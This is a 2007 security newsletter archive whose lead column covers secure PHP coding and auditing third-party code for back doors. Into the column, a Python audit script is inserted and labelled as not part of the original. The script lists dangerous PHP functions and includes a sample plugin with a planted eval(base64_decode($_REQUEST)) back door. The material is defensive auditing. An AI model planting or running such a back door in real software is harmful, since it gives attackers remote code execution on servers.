[ISN] How to Write Secure PHP Code

From: InfoSec News (alerts@private)
Date: Thu Mar 15 2007 - 22:20:11 PST

Forwarded with permission from: Security UPDATE <Security_UPDATE (at) list.windowsitpro.com>


Free Brief: Personal HP Workstations = Higher ROI?

Messaging Security for Small and Midsized Businesses

Before your next company laptop is lost or stolen... 

=== CONTENTS ===================================================

IN FOCUS: How to Write Secure PHP Code

   - Panda Software Sees Rise in Rootkits
   - Relative Unknowns Top Antivirus Test Chart
   - Microsoft Pushes Ahead with OneCare
   - Recent Security Vulnerabilities

   - Security Matters Blog: Gaping Hole in Wordpress
   - FAQ: Windows Not Ready for Daylight Savings Time
   - Tell Us About the Products You Love!
   - Share Your Security Tips

   - NAC Appliance Gets Cheaper and Faster




=== SPONSOR: HP ================================================

Free Brief: Personal HP Workstations = Higher ROI?
   Discover why financial services executives get a LOT more out of 
their IT investments by investing in HP Personal Workstation 
Technology. Quickly learn how workstations ensure accuracy and security 
while driving down short- and long-term operating costs. This quick-read 
guide is a must read today.

=== IN FOCUS: How to Write Secure PHP Code =============
   by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

Last week, I wrote about a few things you need to know about securing 
your PHP installations. I also pointed to several sites that offer good 
information about what to look out for and what configuration changes 
you might need to make. If you missed that article, you can read it on 
our Web site at the URL below. 

If you have PHP installed, then obviously you're going to run PHP code. 
Some of that code might be written by third-party developers and some 
of it you might write yourself. Either way, you should learn about 
secure coding practices for PHP. Doing so can help you write better 
code and help you audit third-party code for potential problems. 

As an example of why the latter is important, be sure to read my blog 
article "Gaping Hole in Wordpress" (you can link to it from the GIVE 
AND TAKE section of this newsletter below) to learn about how someone 
slipped some "back doors" into Wordpress, which is a hugely popular 
PHP-based blogging platform. You can write simple scripts that audit 
third-party code to look for potential back doors by scanning the code 
for any or all of the dangerous functions I discussed last week. 
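The kind of audit script the column describes, as an added example that is not from the column, the newsletter, or any project it mentions: it walks a directory of PHP files and flags calls to code-execution, command-execution and decoding functions, backtick shell execution, include/require statements whose path is built from a variable, and preg_replace patterns using the /e modifier. The function list is my assumption (the "dangerous functions I discussed last week" are not on this page) and should be tuned to local policy; the PHP sample is constructed to show what a planted back door looks like to the scanner. It works line by line, so it also fires on comments and string literals; treat hits as leads for a manual review, not as verdicts.

```python
import re
import sys
from pathlib import Path
from typing import List, NamedTuple

# Assumed watch list (not the column's own list): code execution,
# command execution, and the decoders typically used to hide payloads.
SUSPICIOUS_FUNCTIONS = (
    "eval", "assert", "create_function",
    "exec", "system", "passthru", "shell_exec", "popen", "proc_open",
    "base64_decode", "gzinflate", "gzuncompress", "str_rot13",
)

# PHP function names are case-insensitive, hence IGNORECASE.
CALL_RE = re.compile(r"\b(" + "|".join(SUSPICIOUS_FUNCTIONS) + r")\s*\(", re.IGNORECASE)
# `cmd` is PHP's shell-execution operator.
BACKTICK_RE = re.compile(r"`[^`]*`")
# include/require whose argument (up to the ';') contains a variable.
DYNAMIC_INCLUDE_RE = re.compile(r"\b(include|require)(_once)?\b[^;]*\$", re.IGNORECASE)
# preg_replace with a quoted pattern literal whose modifiers contain 'e'.
PREG_E_RE = re.compile(r"\bpreg_replace\s*\(\s*(['\"])(.)(?:(?!\2).)*\2[a-z]*e[a-z]*\1")


class Finding(NamedTuple):
    path: str
    line: int
    reason: str
    text: str


def scan_source(source: str, path: str = "<string>") -> List[Finding]:
    """Return every suspicious construct found in one PHP source text."""
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        stripped = line.strip()
        for m in CALL_RE.finditer(line):
            findings.append(Finding(path, lineno, f"call to {m.group(1).lower()}()", stripped))
        if BACKTICK_RE.search(line):
            findings.append(Finding(path, lineno, "backtick shell execution", stripped))
        if DYNAMIC_INCLUDE_RE.search(line):
            findings.append(Finding(path, lineno, "include/require with variable path", stripped))
        if PREG_E_RE.search(line):
            findings.append(Finding(path, lineno, "preg_replace with /e modifier", stripped))
    return findings


def scan_tree(root: Path) -> List[Finding]:
    """Scan every *.php file below root (used by the command-line entry point)."""
    findings: List[Finding] = []
    for php in sorted(root.rglob("*.php")):
        findings.extend(scan_source(php.read_text(errors="replace"), str(php)))
    return findings


def format_report(findings: List[Finding]) -> str:
    return "\n".join(f"{f.path}:{f.line}: {f.reason}: {f.text}" for f in findings)


# Constructed sample: a small "plugin" with a planted back door on line 6.
SAMPLE_PHP = r'''<?php
// constructed sample of a blog plugin with a planted back door
$theme = $_GET['theme'];
include("themes/" . $theme . ".php");
$cfg = parse_ini_file('config.ini');
if (isset($_REQUEST['ix'])) { eval(base64_decode($_REQUEST['ix'])); }
$out = `ls -la`;
echo preg_replace('/(.*)/e', 'strtoupper("\1")', $body);
echo htmlspecialchars($cfg['title']);
'''

if __name__ == "__main__":
    # Usage: python audit_php.py /path/to/third-party/code
    if len(sys.argv) > 1:
        print(format_report(scan_tree(Path(sys.argv[1]))))
    else:
        print(format_report(scan_source(SAMPLE_PHP, "sample-plugin.php")))
```

On the constructed sample the scanner reports five findings: the variable-built include on line 4, eval() and base64_decode() on line 6, the backtick command on line 7, and the /e pattern on line 8; the innocuous htmlspecialchars() call on the last line is not reported.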

To help you write your own secure PHP code, I went looking for 
resources and found several decent Web sites that provide writing aid 
and some tools that look for coding vulnerabilities. The sites at the 
URLs below are a big help, so take some time to study them carefully. 
If you know of any others, send me a message with a URL and I'll share 
it here in the newsletter for everyone's benefit. 

Secure Programming in PHP

PHP - Secure coding

Secure Programming for Linux and Unix HOWTO, Chapter 10, Language-
Specific Issues, 10.8 PHP (this pertains to Windows also)

PHP Security Consortium's PHP Security Guide

PHP Input Filter (Developer Shed's Network, PHP Scripts)

SecurePHP Wiki

PHP Top 5 (security problems extracted from SANS Top 20 list)

Top 10 ways to crash PHP

Chorizo! Web Application Security Scanner

PHP Security Scanner


Editor's Note: Do you work in a mixed environment? Visit TechX World 
(first URL below) for information about Windows interoperability. 
The TechX World community gives you access to interoperability articles 
that aren't available anywhere else; news, tips, and tricks from 
interop experts and other users; and forums and blog posts by other 
community members. Join the TechX World community and sign up for the 
TechX Interoperability UPDATE email newsletter (second URL below).

=== SPONSOR: Symantec ==========================================

Messaging Security for Small and Midsized Businesses
   Did you know that 75% of corporate intellectual property resides in 
email? The challenges facing this vital business application range from 
spam to the costly impact of downtime and the need for effective, 
centralized email storage systems. Join us for a free Web seminar and 
learn the key features of a holistic approach to managing email 
security, availability, and control. On-Demand Web Seminar.

=== SECURITY NEWS AND FEATURES =================================

Panda Software Sees Rise in Rootkits
   Panda Software said that in 2006, its PandaLabs team tracked a 62 
percent increase in the amount of malicious code that used rootkit 
technology. The figure is on track to increase even more in 2007.

Relative Unknowns Top Antivirus Test Chart
   In a recent test by AV Comparatives, the top three overall 
performers were G DATA Software AntiVirusKit, AEC TrustPort Antivirus 
Workstation, and Avira AntiVir Personal Edition Premium--not household 
names in the US.

Microsoft Pushes Ahead with OneCare
   In the wake of reports that its Windows Live OneCare security suite 
is inadequate, Microsoft announced plans to release a Live OneCare 2.0 
beta soon.

Recent Security Vulnerabilities
   If you subscribe to this newsletter, you also receive Security 
Alerts, which inform you about recently discovered security 
vulnerabilities. You can also find information about these 
discoveries at

=== SPONSOR: Beachhead =========================================

Before your next company laptop is lost or stolen... 
be sure your valuable data is protected! Lost Data Destruction (LDD) 
from Beachhead Solutions provides immediate and affordable protection 
through enterprise-controlled encryption and destruction of at-risk 
data. No end-user involvement to deploy or manage ensures maximum 
security and workforce productivity. Effective with/without internet 

=== GIVE AND TAKE ==============================================

SECURITY MATTERS BLOG: Gaping Hole in Wordpress
   by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=4DFD0:57B62BBB09A6927928FAD7D792CB2F3D

If you use Wordpress, you might need to upgrade to version 2.1.2 
pronto! There are a couple of huge holes in the code, apparently 
inserted by someone for the purpose of intrusion.

FAQ: Windows Not Ready for Daylight Savings Time
   by John Savill, http://list.windowsitpro.com/t?ctl=4DFCF:57B62BBB09A6927928FAD7D792CB2F3D 

Q: What is the daylight saving time (DST) problem?

Find the answer at

   What products are you using that save you time or make your workload 
a little lighter? What hot product discoveries have you made that other 
IT pros need to know about? Let the world know about your experiences 
in Windows IT Pro's monthly What's Hot department. If we publish your 
story in What's Hot, we'll send you a Best Buy gift card! Send 
information about your favorite product and how it has helped you to 

   Share your security-related tips, comments, or problems and 
solutions in Security Pro VIP's Reader to Reader column. Email your 
contributions to r2r@private. If we print your submission, 
you'll get $100. We edit submissions for style, grammar, and length.

=== PRODUCTS ===================================================
   by Renee Munshi, products@private

NAC Appliance Gets Cheaper and Faster
   Nevis Networks announced LANsecure OS 3.0 for its LANenforcer 
network access control (NAC) appliances. Highlights of the new OS 
version are faster endpoint posture checks coupled with identity-based 
access control, a three-fold increase in user capacity on LANenforcer 
appliances (resulting in reduced costs), and integration with existing 
identity-management systems to enforce predefined application access 
policies to simplify administration. Prices for LANenforcer appliances 
start at $15,000. LANsecure OS 3.0 will be generally available March 
19. For more information, go to

=== RESOURCES AND EVENTS =======================================
   For more security-related resources, visit

Infosecurity Europe is Europe's number-one dedicated Information 
Security event held 24-26 April 2007, Grand Hall, Olympia. Now in its 
12th year, this event continues to provide an unrivalled education 
programme, new products and services, and exhibitors and visitors from 
every segment of the industry. For further information: 

Get Ready for the Windows Server Longhorn Roadshow! 
   Seize control of your Windows infrastructure with Microsoft's 
biggest server release since Windows 2003. Get a live, under-the-hood 
look at Longhorn virtualization, deployment, Web services, and 
breakthroughs in core reliability. This one-day event is filled with 
demonstrations and in-depth discussions designed for IT pros who want a 
deep understanding of Windows Server Longhorn.   

Deploy Exchange Server 2007 Without a Hitch! 
   This one-day technical training event teaches you how to preempt 
pitfalls and avoid corrupting your infrastructure. You'll learn how to 
effectively install, manage, and secure Exchange Server 2007 in a 64-bit 
environment. You'll also get a peek into the integration of 
Outlook, SharePoint Server 2007, and Exchange Server 2007. Register 

=== FEATURED WHITE PAPER =======================================

SQL Reporting Services is an exciting way for organizations to gain 
access and insight into their important business data stored in SQL 
Server. Get an overview of how to increase your production server's 
performance by offloading Reporting Services to a secondary server. 
Download your free copy today! 

=== ANNOUNCEMENTS ==============================================

Introducing a Unique Security Resource 
   Security Pro VIP is an online information center that delivers new 
articles every week on topics such as perimeter security, 
authentication, and system patches. Subscribers also receive tips, 
cautionary advice, direct access to our editors, and a host of other 
benefits! Order now at an exclusive charter rate and save up to $50! 

Grab Your Share of the Spotlight!  
   Nominate yourself or a peer to become IT Pro of the Month. This is 
your chance to get the recognition you deserve! Winners will receive 
over $600 in IT resources and be featured in Windows IT Pro. It's easy 
to enter--we're accepting April nominations now, but only for a limited 
time! Submit your nomination today: 


Security UPDATE is brought to you by the Windows IT Pro Web site's 
Security page (first URL below) and Security Pro VIP (second URL 

Subscribe to Security UPDATE at

Be sure to add Security_UPDATE@private 
to your antispam software's list of allowed senders.

To contact us: 
   About Security UPDATE content -- letters@private
   About technical questions -- http://list.windowsitpro.com/t?ctl=4DFD9:57B62BBB09A6927928FAD7D792CB2F3D
   About your product news -- products@private
   About your subscription -- windowsitproupdate@private
   About sponsoring Security UPDATE -- salesopps@private

View the Windows IT Pro privacy policy at

Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department

Copyright 2007, Penton Media, Inc. All rights reserved.

Visit the InfoSec News Security Bookstore

This archive was generated by hypermail 2.1.3 : Thu Mar 15 2007 - 22:28:35 PST